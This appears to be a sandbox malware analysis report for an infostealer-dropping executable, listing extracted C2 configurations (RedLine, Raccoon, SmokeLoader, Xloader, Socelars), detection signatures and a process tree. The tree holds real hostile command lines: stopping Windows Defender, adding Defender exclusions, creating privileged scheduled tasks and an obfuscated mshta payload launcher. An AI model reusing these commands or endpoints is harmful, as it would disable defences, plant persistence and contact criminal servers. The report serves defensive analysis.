Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
543s -
max time network
1301s -
platform
windows11_x64 -
resource
win11 -
submitted
08/11/2021, 16:12
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Score
10/10
Malware Config
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Extracted
Family
socelars
C2
http://www.hhgenice.top/
Extracted
Family
raccoon
Version
1.8.3-hotfix
Botnet
19425a9ea527ab0b3a94d8156a7d2f62d79d3b73
Attributes
-
url4cnc
http://91.219.236.162/bimboDinotrex
http://185.163.47.176/bimboDinotrex
http://193.38.54.238/bimboDinotrex
http://74.119.192.122/bimboDinotrex
http://91.219.236.240/bimboDinotrex
https://t.me/bimboDinotrex
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
20kinstallov
C2
95.217.123.66:57358
Extracted
Family
redline
Botnet
money
C2
94.26.249.132:19205
Extracted
Family
smokeloader
Version
2020
C2
http://nalirou70.top/
http://xacokuo80.top/
rc4.i32
rc4.i32
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
UAC bypass 3 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
rl_trojan 1 IoCs
redline stealer.
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Arkei Stealer Payload 1 IoCs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
Xloader Payload 3 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 4 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 15 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 15 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
-
Suspicious use of SetThreadContext 11 IoCs
-
Drops file in Program Files directory 19 IoCs
-
Drops file in Windows directory 23 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 25 IoCs
-
NSIS installer 8 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 51 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 5 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 7 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\Uo4Xo4csCcVg5pgA9hXuY4s5.exe"C:\Users\Admin\Pictures\Adobe Films\Uo4Xo4csCcVg5pgA9hXuY4s5.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\E9X6UUspMsNZ0PBOY9yOxppO.exe"C:\Users\Admin\Pictures\Adobe Films\E9X6UUspMsNZ0PBOY9yOxppO.exe"3⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\f5ad82cc-0da7-4925-ace6-449de1285ab7\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f5ad82cc-0da7-4925-ace6-449de1285ab7\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f5ad82cc-0da7-4925-ace6-449de1285ab7\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f5ad82cc-0da7-4925-ace6-449de1285ab7\test.bat"5⤵
-
C:\Windows\system32\sc.exesc stop windefend6⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\85637957-760d-4ea8-8f30-3f73bd2a2def\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\85637957-760d-4ea8-8f30-3f73bd2a2def\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\85637957-760d-4ea8-8f30-3f73bd2a2def\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\85637957-760d-4ea8-8f30-3f73bd2a2def\test.bat"5⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\E9X6UUspMsNZ0PBOY9yOxppO.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\E9X6UUspMsNZ0PBOY9yOxppO.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\E9X6UUspMsNZ0PBOY9yOxppO.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\E9X6UUspMsNZ0PBOY9yOxppO.exe" -Force4⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\cab06ca9-47cd-4a4e-b59b-eec952673008\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\cab06ca9-47cd-4a4e-b59b-eec952673008\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cab06ca9-47cd-4a4e-b59b-eec952673008\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cab06ca9-47cd-4a4e-b59b-eec952673008\test.bat"6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\553d6df5-2e86-4163-9be4-50cd36f37d52\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\553d6df5-2e86-4163-9be4-50cd36f37d52\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\553d6df5-2e86-4163-9be4-50cd36f37d52\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\553d6df5-2e86-4163-9be4-50cd36f37d52\test.bat"6⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\E9X6UUspMsNZ0PBOY9yOxppO.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Dc2cGIo8H66p8bqWXY8d5sy2.exe"C:\Users\Admin\Pictures\Adobe Films\Dc2cGIo8H66p8bqWXY8d5sy2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\SuSwq6ZbytaKosolrsdxuaTC.exe"C:\Users\Admin\Pictures\Adobe Films\SuSwq6ZbytaKosolrsdxuaTC.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\_oukjeZ_kla3Aiol140mLVmm.exe"C:\Users\Admin\Pictures\Adobe Films\_oukjeZ_kla3Aiol140mLVmm.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 2804⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2sLZGnwA8HriCh8TxRV3x7hs.exe"C:\Users\Admin\Pictures\Adobe Films\2sLZGnwA8HriCh8TxRV3x7hs.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\WJgWulYLEFinITcgUMZXyIrr.exe"C:\Users\Admin\Pictures\Adobe Films\WJgWulYLEFinITcgUMZXyIrr.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DgLcL52s5fuUTHkP9A7_9q1c.exe"C:\Users\Admin\Pictures\Adobe Films\DgLcL52s5fuUTHkP9A7_9q1c.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\iJ3HRZcMmv1l2v1Ha5zD_MPf.exe"C:\Users\Admin\Pictures\Adobe Films\iJ3HRZcMmv1l2v1Ha5zD_MPf.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\JwX8BRq3d9XcCTWFaXd9sbty.exe"C:\Users\Admin\Documents\JwX8BRq3d9XcCTWFaXd9sbty.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\wMRHZxmDnN06BIb1svy_pOUH.exe"C:\Users\Admin\Pictures\Adobe Films\wMRHZxmDnN06BIb1svy_pOUH.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\q2_jjJTsIUzhmGqicrkPNjYJ.exe"C:\Users\Admin\Pictures\Adobe Films\q2_jjJTsIUzhmGqicrkPNjYJ.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 2766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\eKDrXNoWQdVqaAJwdWLmVvaZ.exe"C:\Users\Admin\Pictures\Adobe Films\eKDrXNoWQdVqaAJwdWLmVvaZ.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5952 -s 2966⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LHnzFYdxKc_gnQtfUduV_w9I.exe"C:\Users\Admin\Pictures\Adobe Films\LHnzFYdxKc_gnQtfUduV_w9I.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 17646⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\vVSV80BeWGNUEHdpalA3gZWd.exe"C:\Users\Admin\Pictures\Adobe Films\vVSV80BeWGNUEHdpalA3gZWd.exe"5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\vVSV80BeWGNUEHdpalA3gZWd.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\vVSV80BeWGNUEHdpalA3gZWd.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\vVSV80BeWGNUEHdpalA3gZWd.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\vVSV80BeWGNUEHdpalA3gZWd.exe" ) do taskkill -f -iM "%~NxM"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "vVSV80BeWGNUEHdpalA3gZWd.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\taOOmjUk5xD6cNgkYPD6mJIw.exe"C:\Users\Admin\Pictures\Adobe Films\taOOmjUk5xD6cNgkYPD6mJIw.exe"5⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\DMxOky3fPLdbuAbmlCGtIt1a.exe"C:\Users\Admin\Pictures\Adobe Films\DMxOky3fPLdbuAbmlCGtIt1a.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7fffe9d5dec0,0x7fffe9d5ded0,0x7fffe9d5dee08⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1724,5456320662593829198,10236297156770314360,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4240_850242167" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1780 /prefetch:28⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,5456320662593829198,10236297156770314360,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4240_850242167" --mojo-platform-channel-handle=1832 /prefetch:88⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1724,5456320662593829198,10236297156770314360,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4240_850242167" --mojo-platform-channel-handle=2120 /prefetch:88⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1724,5456320662593829198,10236297156770314360,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4240_850242167" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2544 /prefetch:18⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1724,5456320662593829198,10236297156770314360,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4240_850242167" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2640 /prefetch:18⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1724,5456320662593829198,10236297156770314360,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4240_850242167" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2832 /prefetch:28⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1724,5456320662593829198,10236297156770314360,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4240_850242167" --mojo-platform-channel-handle=1996 /prefetch:88⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1724,5456320662593829198,10236297156770314360,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4240_850242167" --mojo-platform-channel-handle=1800 /prefetch:88⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3AX2JQ3lZXv3VLoelF5woHq8.exe"C:\Users\Admin\Pictures\Adobe Films\3AX2JQ3lZXv3VLoelF5woHq8.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-R02GU.tmp\3AX2JQ3lZXv3VLoelF5woHq8.tmp"C:\Users\Admin\AppData\Local\Temp\is-R02GU.tmp\3AX2JQ3lZXv3VLoelF5woHq8.tmp" /SL5="$1042A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\3AX2JQ3lZXv3VLoelF5woHq8.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-2IMRL.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-2IMRL.tmp\DYbALA.exe" /S /UID=27097⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
